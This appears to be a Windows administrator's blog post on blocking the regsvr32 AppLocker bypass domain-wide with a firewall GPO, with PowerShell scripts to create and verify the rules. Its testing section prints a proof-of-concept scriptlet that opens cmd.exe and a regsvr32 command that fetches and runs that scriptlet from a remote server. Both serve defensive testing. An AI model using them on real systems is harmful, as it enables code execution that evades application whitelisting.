GPO to block regsvr32 AppLocker Bypass Vulnerability

A recently discovered method of bypassing AppLocker with regsvr32.exe poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions). To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall. Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.

Create a GPO and Edit

In Group Policy Management, I created a new GPO, named it "Firewall: Block regsvr32", and then edited it.

Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security

Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.

Create a new inbound rule to block regsvr32.exe.

Inbound Rule Wizard

Choose Program as the type of rule to create and click Next >.

Use C:\Windows\System32\regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it and choose it.

Choose Block as the action and click Next >.

Apply it to all network locations (Domain, Private, and Public).

Give the rule a name and, optionally, a description.

The blocking rule is now listed under Inbound Rules.

Outbound Rule Wizard

Repeat the steps from the Inbound Rule Wizard, but this time under Outbound Rules.
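The same two rules can be written into the GPO from PowerShell instead of clicking through the wizard twice. The script below is an added example, not part of the original post: it uses the NetSecurity cmdlets (Open-NetGPO, New-NetFirewallRule, Save-NetGPO) to batch the Inbound and Outbound block rules into the GPO's firewall store. $Domain is a placeholder for your domain name; $GpoName matches the GPO named in the post. It also covers the 32-bit copy of the binary under SysWOW64 on 64-bit Windows, which the post's wizard steps do not mention.

```powershell
# Added example (not from the original post): create the Inbound and Outbound
# "Block regsvr32.exe" rules directly in the GPO's firewall policy store.
# Assumptions: run as an account that can edit the GPO, from a machine with
# the Group Policy Management tools (RSAT) installed. $Domain is a placeholder.
$Domain  = 'corp.example'               # placeholder, replace with your domain
$GpoName = 'Firewall: Block regsvr32'   # GPO name used in the post

# Open the GPO once; all rule changes are cached in this session until saved.
$gpo = Open-NetGPO -PolicyStore "$Domain\$GpoName"

# The post blocks the System32 copy; the SysWOW64 copy is the 32-bit regsvr32
# on 64-bit Windows and is added here as a practitioner's caveat.
$programs = @(
    'C:\Windows\System32\regsvr32.exe',
    'C:\Windows\SysWOW64\regsvr32.exe'
)

foreach ($exe in $programs) {
    foreach ($direction in 'Inbound', 'Outbound') {
        New-NetFirewallRule -GPOSession $gpo `
            -DisplayName "Block regsvr32 ($direction) - $exe" `
            -Description 'Prevents regsvr32.exe from reaching remote scriptlets (AppLocker bypass mitigation)' `
            -Direction $direction `
            -Program $exe `
            -Action Block `
            -Profile Any `
            -Enabled True | Out-Null
    }
}

# Write the cached rules back to the GPO.
Save-NetGPO -GPOSession $gpo
```

-Profile Any corresponds to the wizard's "apply to all network locations" step, and -Action Block to the Block action. After saving, the rules appear in the GPO under Windows Firewall with Advanced Security exactly as if they had been created with the wizard, and the GPO can be linked as usual.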

Link GPO

Now that the GPO is created, you can link the policy within your domain as usual.

Testing

To test that the rule is effective, run gpupdate /force on your system to force an immediate Group Policy refresh.

I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file yourself (the extension doesn’t have to be .SCT; it can be anything…).

backdoor.sct

<?XML version="1.0"?>
<scriptlet>
<registration
 progid="Empire"
 classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
 <!-- Proof Of Concept - Casey Smith @subTee -->
 <script language="JScript">
 <![CDATA[

 var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

 ]]>
</script>
</registration>
</scriptlet>

Command to run:

regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll

If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).
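Rather than relying only on whether a command window appears, you can confirm on the workstation that the GPO's rules actually arrived and are enabled. The script below is an added example, not part of the original post: after the gpupdate /force the post calls for, it reads the effective firewall policy (ActiveStore, which merges local rules with Group Policy) and reports whether regsvr32.exe is blocked in both directions. No environment-specific names are assumed; run it locally on a client in the GPO's scope.

```powershell
# Added example (not from the original post): verify the regsvr32 block rules
# are present and enabled on this machine after a Group Policy refresh.
gpupdate /force | Out-Null

# ActiveStore is the effective, merged policy (local + Group Policy rules).
# Find application filters pointing at regsvr32.exe, then their parent rules.
$rules = Get-NetFirewallApplicationFilter -PolicyStore ActiveStore |
    Where-Object { $_.Program -like '*regsvr32.exe' } |
    Get-NetFirewallRule

$report = foreach ($direction in 'Inbound', 'Outbound') {
    $match = $rules | Where-Object {
        $_.Direction -eq $direction -and
        $_.Action    -eq 'Block'    -and
        $_.Enabled   -eq 'True'
    }
    [pscustomobject]@{
        Direction = $direction
        Blocked   = [bool]$match
        # GroupPolicy here confirms the rule came from the GPO, not a local edit.
        Source    = (($match.PolicyStoreSourceType | Select-Object -Unique) -join ',')
        Rules     = (($match.DisplayName) -join '; ')
    }
}

$report | Format-Table -AutoSize

if ($report.Blocked -contains $false) {
    Write-Warning 'regsvr32.exe is not blocked in both directions; check the GPO link and gpresult /r.'
}
```

If either direction reports Blocked as False, or Source is Local instead of GroupPolicy, the GPO is not being applied to this machine (wrong link, security filtering, or a stale refresh), which is the "double-check your work" case the post describes.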
